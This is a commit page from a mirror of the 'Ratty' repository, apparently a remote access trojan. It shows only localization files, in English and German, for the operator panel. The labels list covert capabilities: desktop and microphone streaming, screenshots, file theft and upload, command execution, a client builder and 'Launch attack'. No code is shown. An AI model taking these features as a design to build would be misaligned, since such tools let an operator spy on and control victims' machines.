mirror of https://github.com/LucaBongiorni/Ratty
Sogomn
9 years ago
8 changed files with 169 additions and 50 deletions
-
31Ratty/res/language/lang.properties
-
31Ratty/res/language/lang_de.properties
-
31Ratty/res/language/lang_en.properties
-
27Ratty/src/de/sogomn/rat/Ratty.java
-
16Ratty/src/de/sogomn/rat/server/gui/FileTree.java
-
26Ratty/src/de/sogomn/rat/server/gui/RattyGui.java
-
4Ratty/src/de/sogomn/rat/server/gui/RattyGuiController.java
-
55Ratty/src/de/sogomn/rat/server/gui/ServerClientTableModel.java
@ -0,0 +1,31 @@ |
|||
debug.question=Server or client? |
|||
debug.server=Server |
|||
debug.client=Client |
|||
|
|||
server.port_message=Which port should the server be bind to? |
|||
|
|||
action.popup=Open popup |
|||
action.screenshot=Take screensot |
|||
action.desktop=Toggle desktop stream |
|||
action.voice=Toggle microphone stream |
|||
action.files=Browse files |
|||
action.command=Execute command |
|||
action.clipboard=Show clipboard |
|||
action.website=Open website |
|||
action.audio=Play audio |
|||
action.free=Free client |
|||
action.build=Client builder |
|||
action.attack=Launch attack |
|||
action.request_files=Request content |
|||
action.download=Download file |
|||
action.upload=Upload file here |
|||
action.execute=Execute file |
|||
action.delete=Delete file |
|||
action.new_directory=Create new directory |
|||
|
|||
column.name=Name |
|||
column.address=IP Address |
|||
column.os=OS |
|||
column.version=Version |
|||
column.desktop=Streaming desktop |
|||
column.voice=Streaming voice |
@ -0,0 +1,31 @@ |
|||
debug.question=Server oder Client? |
|||
debug.server=Server |
|||
debug.client=Client |
|||
|
|||
server.port_message=An welchen Port soll der Server gebunden werden? |
|||
|
|||
action.popup=Popup öffnen |
|||
action.screenshot=Screenshot machen |
|||
action.desktop=Desktopstream an/aus |
|||
action.voice=Mikrofonstream an/aus |
|||
action.files=Dateien durchsuchen |
|||
action.command=Befehl ausführen |
|||
action.clipboard=Zwischenablage zeigen |
|||
action.website=Webseite öffnen |
|||
action.audio=Audiodatei abspielen |
|||
action.free=Client befreien |
|||
action.build=Clientbuilder |
|||
action.attack=Angriff starten |
|||
action.request_files=Inhalt anfordern |
|||
action.download=Datei herunterladen |
|||
action.upload=Datei hier hochladen |
|||
action.execute=Datei ausführen |
|||
action.delete=Datei löschen |
|||
action.new_directory=Neuen Ordner erstellen |
|||
|
|||
column.name=Name |
|||
column.address=IP-Adresse |
|||
column.os=OS |
|||
column.version=Version |
|||
column.desktop=Desktopstream |
|||
column.voice=Mikrofonstream |
@ -0,0 +1,31 @@ |
|||
debug.question=Server or client? |
|||
debug.server=Server |
|||
debug.client=Client |
|||
|
|||
server.port_message=Which port should the server be bind to? |
|||
|
|||
action.popup=Open popup |
|||
action.screenshot=Take screensot |
|||
action.desktop=Toggle desktop stream |
|||
action.voice=Toggle microphone stream |
|||
action.files=Browse files |
|||
action.command=Execute command |
|||
action.clipboard=Show clipboard |
|||
action.website=Open website |
|||
action.audio=Play audio |
|||
action.free=Free client |
|||
action.build=Client builder |
|||
action.attack=Launch attack |
|||
action.request_files=Request content |
|||
action.download=Download file |
|||
action.upload=Upload file here |
|||
action.execute=Execute file |
|||
action.delete=Delete file |
|||
action.new_directory=Create new directory |
|||
|
|||
column.name=Name |
|||
column.address=IP Address |
|||
column.os=OS |
|||
column.version=Version |
|||
column.desktop=Streaming desktop |
|||
column.voice=Streaming voice |
Write
Preview
Loading…
Cancel
Save
Reference in new issue